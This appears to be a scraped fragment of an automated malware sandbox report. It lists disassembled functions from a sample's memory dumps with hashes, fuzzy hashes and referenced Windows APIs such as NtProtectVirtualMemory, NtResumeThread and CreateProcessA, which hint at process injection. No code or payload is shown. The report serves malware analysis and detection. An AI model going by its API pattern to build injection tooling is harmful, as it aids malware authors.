Instruction ID: 9a2cff7ce67e6614e1418a40368a64da54cc9e6cc2717ae2440f8c2549519f86
Opcode Fuzzy Hash: 2dd9ced9a472d8c1a04b24b23b73dac41d8ae8737ff81fb61ce859a34bffee42
Instruction Fuzzy Hash: CF13D57A600105AFDB469F88DC48E56BBB3FF8D314B0681D4E209AB276C736D961EF50

Function 06EFF1E0 Relevance: 2.8, Strings: 2, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!, xrefs: 06EFF2B7
", xrefs: 06EFF5EB

Memory Dump Source

Source File: 00000006.00000002.1424746130.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_50201668.jbxd

Similarity

API ID:
String ID: !$"
API String ID: 0-3796260231
Opcode ID: d895a0c0140e0e2be3b844c29796c5c6c34ac2f7e53d266d92be3c159a86d62c
Instruction ID: bb888a0810617a2970480c47436bf96db0da4b8e52fea718413803260381df10
Opcode Fuzzy Hash: d895a0c0140e0e2be3b844c29796c5c6c34ac2f7e53d266d92be3c159a86d62c
Instruction Fuzzy Hash: 49C1D074D15348CFEB80CFAAD448BEEBBB1AB49304F10E116C619BB251D7B99845CFA4

Function 06E00040 Relevance: 2.6, Strings: 1, Instructions: 1335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 06E0101E

Memory Dump Source

Source File: 00000006.00000002.1424195343.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e00000_50201668.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 8f5befcfa0463d9823ac32d6b735a27ecd861dccc281fe75c501db11fe3eee1d
Instruction ID: 6456ca9e86edebef061facf951a7669ce14195232ae27254671b765778d9784b
Opcode Fuzzy Hash: 8f5befcfa0463d9823ac32d6b735a27ecd861dccc281fe75c501db11fe3eee1d
Instruction Fuzzy Hash: 25E2D474E002298FDBA4DF68D89479ABBF2FB89301F1091E9D509AB354DB349E85CF50

Function 06DDEF40 Relevance: 2.4, Strings: 1, Instructions: 1179COMMON

Download Yara Rule

Strings

4, xrefs: 06DDF915

Memory Dump Source

Source File: 00000006.00000002.1424090170.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6dd0000_50201668.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: b7489bf41408dc02f14763a9128098838c979ef1506b059056ebf48dbb0fa3f5
Instruction ID: 0737c79261b863cfe4adb17d67ea000cdf38c8bb1ac9acd34dfe039b95fdda3f
Opcode Fuzzy Hash: b7489bf41408dc02f14763a9128098838c979ef1506b059056ebf48dbb0fa3f5
Instruction Fuzzy Hash: EDB2F634A00219DFDB54DFA9D994BADB7B6FB88300F158199E506AB3A5CB70EC81CF50

Function 07197B28 Relevance: 1.9, Strings: 1, Instructions: 610
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 07197C32

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 23adb44ede62c3549b4926d1cdcc2afb0570da364d8c144ddc86b8991947d595
Instruction ID: 1edc82ade17fb8dbc17799d647cb8ca0bdcd922532c1159848152fde07d3ad44
Opcode Fuzzy Hash: 23adb44ede62c3549b4926d1cdcc2afb0570da364d8c144ddc86b8991947d595
Instruction Fuzzy Hash: 3852D3B5E002298FDBA4DF69D854AD9B7B2FF89300F1085AAD509B7354DB34AE81CF50

Function 06DDF267 Relevance: 1.7, Strings: 1, Instructions: 495COMMON

Download Yara Rule

Strings

4, xrefs: 06DDF915

Memory Dump Source

Source File: 00000006.00000002.1424090170.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6dd0000_50201668.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 3e38bec150c419b9dc58fee03e71dc9f4ab358ad6d2298b5e8844e9313ee3a46
Instruction ID: 95f6190b027145ad11026a3539bd7e8ac9f9d06f8ea9302566049eb0a1c25041
Opcode Fuzzy Hash: 3e38bec150c419b9dc58fee03e71dc9f4ab358ad6d2298b5e8844e9313ee3a46
Instruction Fuzzy Hash: AC22FB74A00219CFDB64DF69C994BADB7B2FF88300F158199D50AAB3A5DB30AD81CF51

Function 0719B2E8 Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0719B379

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: dacababb398e7a7acd09102fd60ac120729a7434a4fccf367e8da856f311d977
Instruction ID: 6f12bac4b1bf6c9bb6fad98134cfa9681e66f721639b4dfe20b72e911472c3e0
Opcode Fuzzy Hash: dacababb398e7a7acd09102fd60ac120729a7434a4fccf367e8da856f311d977
Instruction Fuzzy Hash: 9A2124B5D003499FDB20CFAAD980AEEFBF5FF48310F20842AE419A7650C7359945CBA1

Function 0719B2F0 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0719B379

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 011f0510c92f8737a423355d777fa915711aad62fba25a4d5480de69cc738239
Instruction ID: 0f254d52c6568c81e81a725a3a681344def5f6de06c5799750c7c5dfd00a7e1a
Opcode Fuzzy Hash: 011f0510c92f8737a423355d777fa915711aad62fba25a4d5480de69cc738239
Instruction Fuzzy Hash: 4321E3B1D013499FDB20DFAAD980ADEFBF5FF48310F20842AE519A7250D775A901CBA5

Function 0719EBCA Relevance: 1.6, APIs: 1, Instructions: 55nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0719EC3E

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ed7688c3227081154f636204c915c4acd8b9d66b3b6071107a1102fa644d6817
Instruction ID: ffc45ff5c9a8f7a70ba7dc4c6d6f5da792e3540301da7c5eff4714809632fa6b
Opcode Fuzzy Hash: ed7688c3227081154f636204c915c4acd8b9d66b3b6071107a1102fa644d6817
Instruction Fuzzy Hash: 261133B1D002489FDB24DFAAC480BAEFBF4EF48210F14842AD459A7240CB799905CFA5

Function 0719EBD0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0719EC3E

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8390be0df92fa4f29dc88844c31032c92c566127c3300c7541c9f6af756e782f
Instruction ID: e7bd149e399f2d74e85672b52e46f67ce4d122bfe5bc47bbe841320adf7bc903
Opcode Fuzzy Hash: 8390be0df92fa4f29dc88844c31032c92c566127c3300c7541c9f6af756e782f
Instruction Fuzzy Hash: 501114B1D003489FDB24DFAAC584BAEFBF4EF48210F14842ED459A7240CB79A905CFA5

Function 07197B18 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

h, xrefs: 07197C26

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: f9160e2f1ec8ced3885572aba98b1eeefb3f28d20c0a23ce4dd8b726df866016
Instruction ID: 3aa02b66bb4019f6103d6a88dd3cecd1524f8251684aac2e9b1f87b33986b794
Opcode Fuzzy Hash: f9160e2f1ec8ced3885572aba98b1eeefb3f28d20c0a23ce4dd8b726df866016
Instruction Fuzzy Hash: 00710475E002298FEB64DF69C854BD9B7B2FF8A300F1081AAD519B7290DB349E85CF50

Function 0183D6A0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

JU, xrefs: 0183D882

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID: JU
API String ID: 0-4284719772
Opcode ID: 66aab835c6ed7d9e920f4dc9d07576d8a1c79c8babf203810f55f93a8b8ed9e1
Instruction ID: 4b3ef9bb25d99d4133a6a0d35b9ec435e7d1ad563cedcd5fedf7a83944f49354
Opcode Fuzzy Hash: 66aab835c6ed7d9e920f4dc9d07576d8a1c79c8babf203810f55f93a8b8ed9e1
Instruction Fuzzy Hash: 68510974E01209CFDB44CFA9D5846AEBBF2FF88300F588625D519EB355D7389A81CB91

Function 06EF7828 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

4, xrefs: 06EF78F7

Memory Dump Source

Source File: 00000006.00000002.1424746130.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_50201668.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 69a9b137fb86b6795015872f3be4f7f4cf1ae857749dc0e1ddb1b42808fc9c81
Instruction ID: ba1a1f3f9a96a129d4ff4486d8827330a1bfdba8d3a8be28533ec937e4376dde
Opcode Fuzzy Hash: 69a9b137fb86b6795015872f3be4f7f4cf1ae857749dc0e1ddb1b42808fc9c81
Instruction Fuzzy Hash: E2314A71E153188FEB58CFAAD8406DEBBF6AFC9300F14C1AAC918A7254EB300A45CF51

Function 0183B178 Relevance: 1.0, Instructions: 956COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bca0fbc1da0424fa675972056295738cc0602502ddb40e4692c4c8c0416fe95
Instruction ID: 64668de7832d15c6305442b364d14c5dc6027ea1dc69ed04451eb0ac7af3e5e8
Opcode Fuzzy Hash: 0bca0fbc1da0424fa675972056295738cc0602502ddb40e4692c4c8c0416fe95
Instruction Fuzzy Hash: 9BA29275E00628CFDB65CF69C984A99BBB2FF89314F1581E9D509AB321DB319E81CF40

Function 06DEDCB8 Relevance: .8, Instructions: 815COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424125645.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6de0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02fc56afe4c2f6dc912cd6aaba6329cb9a78a8c4cfc0fc7bad32f1b802048a94
Instruction ID: da2c28e272c554a800e8ac97430c4fb19f6632e51c491ad17d1ce18a6f029ba7
Opcode Fuzzy Hash: 02fc56afe4c2f6dc912cd6aaba6329cb9a78a8c4cfc0fc7bad32f1b802048a94
Instruction Fuzzy Hash: B3628B74A007068FDB55EF69C494A6EBBF2FF88300F248929D596D7790DB34E942CB90

Function 06E019A3 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424195343.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e00000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0fed74766e5a0516abdfc60318a6359b82e2bbb6d3c1d9fe8ebadeced415e6
Instruction ID: 35be85a0e3612f416904a120b013224f9187c690bdcf86f5084842ab65c235e0
Opcode Fuzzy Hash: 6c0fed74766e5a0516abdfc60318a6359b82e2bbb6d3c1d9fe8ebadeced415e6
Instruction Fuzzy Hash: 0252C474A002298FDBA4DF28C988B9AB7F2FB89301F1095D9D50DAB351DB349E81CF51

Function 01833300 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f139a26b0e98b5add13d259b70dc83d1e5033421faeb1f2223c79d1f10da6c05
Instruction ID: ca3e7001dd66561dee656f52c95d42547fc6c3e3a17c40c4562f670a2f45fbcc
Opcode Fuzzy Hash: f139a26b0e98b5add13d259b70dc83d1e5033421faeb1f2223c79d1f10da6c05
Instruction Fuzzy Hash: 3A129071A0420ADFDB15CF68C484AAAB7F1FF88314F19856AE806EB351D734EE45CB91

Function 06DDAEA8 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424090170.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6dd0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d53295caf5907a799fb8f9e4136e997346fbc2d27d56e3e749b16f377a936752
Instruction ID: f6591d25e5ca87395a5f30ed4bac3494ad4175dad1d836642bf861d29cfe7fe6
Opcode Fuzzy Hash: d53295caf5907a799fb8f9e4136e997346fbc2d27d56e3e749b16f377a936752
Instruction Fuzzy Hash: 520216B4E01218CFEBA4DF69D844BA9B7F2FB8A304F1091AAD509A7354DB349D81CF41

Function 06DDAE9A Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424090170.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6dd0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8ea66d6294124a78eaee7000f82998bd9b63ef8cfd125c4e586e5ac95df4b32
Instruction ID: 3958f6d13db3d5d9452d37f2adf0582f6042f8ca1fc75b7b66a8eb67c5473779
Opcode Fuzzy Hash: e8ea66d6294124a78eaee7000f82998bd9b63ef8cfd125c4e586e5ac95df4b32
Instruction Fuzzy Hash: 7C0224B4E01218CFEBA4DF69D844B99B7F2FB89304F1481AAD508A7354DB389E81CF51

Function 0719CC88 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32c1a3cb4bf60d0473dd85e7f4731bbc88200c9f9f730a47f37804b9d1482ddf
Instruction ID: 2494f8f97a3374be343a3eb2c92ac8deac79dd674c98db59bad3e12ba569773a
Opcode Fuzzy Hash: 32c1a3cb4bf60d0473dd85e7f4731bbc88200c9f9f730a47f37804b9d1482ddf
Instruction Fuzzy Hash: BDF137B4E05218CFDF64CF69E944BADBBF2FB4A300F1091A9C449A3281D7384986CF50

Function 06DF3E08 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424159382.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94487925cbe3e849536d51e2feeda2ac4a79da88ecdb5cf08cc6e702172027ce
Instruction ID: 8d1116f2168b3693694630487f5c62ea1ea136c92e2f7ad1c355e3a5ff92e9a1
Opcode Fuzzy Hash: 94487925cbe3e849536d51e2feeda2ac4a79da88ecdb5cf08cc6e702172027ce
Instruction Fuzzy Hash: 78E11674E14218CFEBA4CF69D844B9EBBF2FF89300F1280A9D618A7255DB749985CF41

Function 06DF3DF7 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424159382.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d0446239320a15c2af92e94eb7366c02ec2f84277a4bb7cd9dc5b515f154d9
Instruction ID: 011a6c71d8beae0a892fdabc527c3e82a96546caecd7f660022f6fe20e835d39
Opcode Fuzzy Hash: 34d0446239320a15c2af92e94eb7366c02ec2f84277a4bb7cd9dc5b515f154d9
Instruction Fuzzy Hash: 00E11774E14218CFEBA4CF69D444B9EBBF2FF89300F1280A9D518A7255DB749985CF41

Function 0719D325 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ea72ae3a0d8d81217cfa78aa6b95297dec026c754f1832d058fe497f1213dd1
Instruction ID: ab09ef24e60a0044f7d5052c72bc50bfe4cef53bd1dbdf71f67de04f5da8f6ef
Opcode Fuzzy Hash: 0ea72ae3a0d8d81217cfa78aa6b95297dec026c754f1832d058fe497f1213dd1
Instruction Fuzzy Hash: 8CD116B4E05219CFDF64CF68E944B9DBBF2FB4A300F1091A9C549A7280D7788986CF54

Function 0183D988 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9151bc060d487b73eeed7f261c95275bd1cad535f21961382323bf20e807f55
Instruction ID: 46cfa235e8885f987c87380879b2b870491d01bde958666c6bba7fb8a7b5e3a7
Opcode Fuzzy Hash: a9151bc060d487b73eeed7f261c95275bd1cad535f21961382323bf20e807f55
Instruction Fuzzy Hash: BED1B274E00218CFDB64DFA9D894A9DBBB2FF89300F1481A9D409AB365DB359D86CF50

Function 01833170 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7506acdb63de2666811b9896782436df53073a4450a6ac2bfda40b49feebc117
Instruction ID: 2e40563921380cb2cdb250d71be9e2c8339e36462fe7817511089c41ec0d31a2
Opcode Fuzzy Hash: 7506acdb63de2666811b9896782436df53073a4450a6ac2bfda40b49feebc117
Instruction Fuzzy Hash: 80A17F31A0420ACFDB15DFA8D880AEEB7B1FF84314F19856AE905FB251D734AB45CB91

Function 06E05E8D Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424195343.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e00000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a579b4967cd0cdabbe22b5964c65d76221b75271bc2edc84af0791cf5f7be
Instruction ID: 3ba789660f097f60e7c0219450c3d3d5fa9d33cb9f221da8e52e023dd4be0dba
Opcode Fuzzy Hash: 445a579b4967cd0cdabbe22b5964c65d76221b75271bc2edc84af0791cf5f7be
Instruction Fuzzy Hash: 15B11670D05358CFEB55CFA9C948BDDBBF6BB89300F1090A9D409AB295C7789A89CF40

Function 06DD87D1 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424090170.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6dd0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b951d64484e8ae57b6d0e2e052a7bd8cf208d5bb6d2438fdbf37ad63558ddcf8
Instruction ID: e1a24536c61adcc0d83284396462d10d4c66e304605cf237cc0c383644824dec
Opcode Fuzzy Hash: b951d64484e8ae57b6d0e2e052a7bd8cf208d5bb6d2438fdbf37ad63558ddcf8
Instruction Fuzzy Hash: 94B11274E01208CFEB95EFA9E844B9EB7F2FB89300F209169D419A7255DB385D85CF40

Function 06DD87E0 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424090170.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6dd0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b38e7d59cb99e2c167685ea59c150ae73a68293bb4306258a0355f50da1fcd7b
Instruction ID: 914df43abdf6f1190cdd5c948ae4d29ab3bc93a698f748c4374f306f01557b7c
Opcode Fuzzy Hash: b38e7d59cb99e2c167685ea59c150ae73a68293bb4306258a0355f50da1fcd7b
Instruction Fuzzy Hash: 8AB13470E01208CFEB95EFA9E844BAEB7F2FB89300F109169D419A7255DB389D85DF40

Function 06E05EA8 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424195343.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e00000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6223a030928dff0bd39cb40f6cdb44bca507fdd7d1381f3757502a61a8e334e1
Instruction ID: c231e9b39fe6e992c4681e9d4ed3edada627399066bd4d81655fda8cc55608be
Opcode Fuzzy Hash: 6223a030928dff0bd39cb40f6cdb44bca507fdd7d1381f3757502a61a8e334e1
Instruction Fuzzy Hash: 50B1E570D053588FEB64CFA5C948BDDBBF6BB89304F10A0A9D40DAB295D7789A85CF40

Function 07190007 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a0fe3332b41a04e2d169c7bb74c6b63d3315df4c54d45aeef0b98f0f45e052a
Instruction ID: f7ef4a39377a098bc5cf3203713042c0559b55cebb78f0e6c7ca2ff13c24fbb4
Opcode Fuzzy Hash: 8a0fe3332b41a04e2d169c7bb74c6b63d3315df4c54d45aeef0b98f0f45e052a
Instruction Fuzzy Hash: 159136B4D15209CFDB54CFA9D8547ADBBF2FF8A300F15816AD018AB295EB384986CF50

Function 01833E20 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8885d960de433491dde89da0ad4b3538aa5b87945903adde9e539cda706b116e
Instruction ID: 6f6ce5cac06ad9326c4916668d755010c3c972d575f86d27f434ff027e88ba88
Opcode Fuzzy Hash: 8885d960de433491dde89da0ad4b3538aa5b87945903adde9e539cda706b116e
Instruction Fuzzy Hash: 5C61F530B04308CFD7249A79DC5072ABBA2FBC6710F29456AE406DB3D1DA35DE4287E2

Function 06E00007 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424195343.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e00000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31525f100880456b2da2df2eda1002d2765c40fdf78b33a20a2bc19f015ecb3b
Instruction ID: 3e8383bf67fd033d11effbb08e1713c93a9f991b006aa575f30bccce8ba63ef6
Opcode Fuzzy Hash: 31525f100880456b2da2df2eda1002d2765c40fdf78b33a20a2bc19f015ecb3b
Instruction Fuzzy Hash: 4C61FA71E01A588BEB19CF6ADC4479ABBF3BFC9301F14C0AAC448AB255EB744985CF51

Function 06E09C02 Relevance: 2.5, Strings: 2, Instructions: 21
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3, xrefs: 06E09C2A
j, xrefs: 06E09C56

Memory Dump Source

Source File: 00000006.00000002.1424195343.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e00000_50201668.jbxd

Similarity

API ID:
String ID: 3$j
API String ID: 0-2246306619
Opcode ID: 9ea117218da7c65c88e441707bd6e905b4bc54fab0e3aafaaabbf3b53c953e15
Instruction ID: e57c208a1290894e9901d6a2787381838a3b8e8f5b22c172db7078cecdac2c88
Opcode Fuzzy Hash: 9ea117218da7c65c88e441707bd6e905b4bc54fab0e3aafaaabbf3b53c953e15
Instruction Fuzzy Hash: DBF0B7B0A5126ACEEBA4DF18C8C4B99B7B0BB09344F0045F99519A6280D7755AC4CF49

Function 0719BCEA Relevance: 1.7, APIs: 1, Instructions: 205
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0719BECA

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2876c56cafacd0c2f700e0819f10560032a9f03f6a0a03a4a7bb41486f12c568
Instruction ID: 364853aefdcc07e65aae3ec161f066a7de1af0fb2e327925b62ff609795bb993
Opcode Fuzzy Hash: 2876c56cafacd0c2f700e0819f10560032a9f03f6a0a03a4a7bb41486f12c568
Instruction Fuzzy Hash: 4E8126B1D04259DFDF21CFA9D9857EDBBF2AF48314F148129E855A7280DB749882CF81

Function 0719BCF0 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0719BECA

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9db29cb605f213ae3d9d2b512e945b20c973fd0e714fe3030fcd60514984a9b8
Instruction ID: 2d3c49a646056831db3deef4dce9e43514582870d08e85528322a81592d04e0d
Opcode Fuzzy Hash: 9db29cb605f213ae3d9d2b512e945b20c973fd0e714fe3030fcd60514984a9b8
Instruction Fuzzy Hash: 748136B1D042199FDF21CFA9D8857EDBBF2AF48314F148129E855E7280DB7898828F81

Function 07190AC4 Relevance: 1.6, APIs: 1, Instructions: 147
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(?,?,?), ref: 07190C15

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 243e3f30b76f5f52f5a15720a3fd2aa36293befa56067d3b35ff52b31011a0dc
